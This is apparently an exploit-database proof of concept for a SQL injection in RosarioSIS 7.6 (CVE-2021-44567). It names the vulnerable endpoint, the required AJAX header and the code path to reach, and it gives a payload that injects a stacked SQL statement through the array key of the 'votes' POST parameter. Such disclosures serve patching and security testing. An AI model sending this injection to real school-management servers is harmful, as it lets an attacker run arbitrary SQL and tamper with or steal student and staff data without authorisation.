# Exploit Title: RosarioSIS 7.6 - SQL Injection # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis # Software Link: https://gitlab.com/francoisjacquet/rosariosis # Version: 7.6 # Tested on: Ubuntu Windows # CVE : CVE-2021-44567 PoC: POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1 X-Requested-With: XMLHttpRequest constrain and some flow: isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array ) votes['; CREATE TABLE aaa(t text) --]=1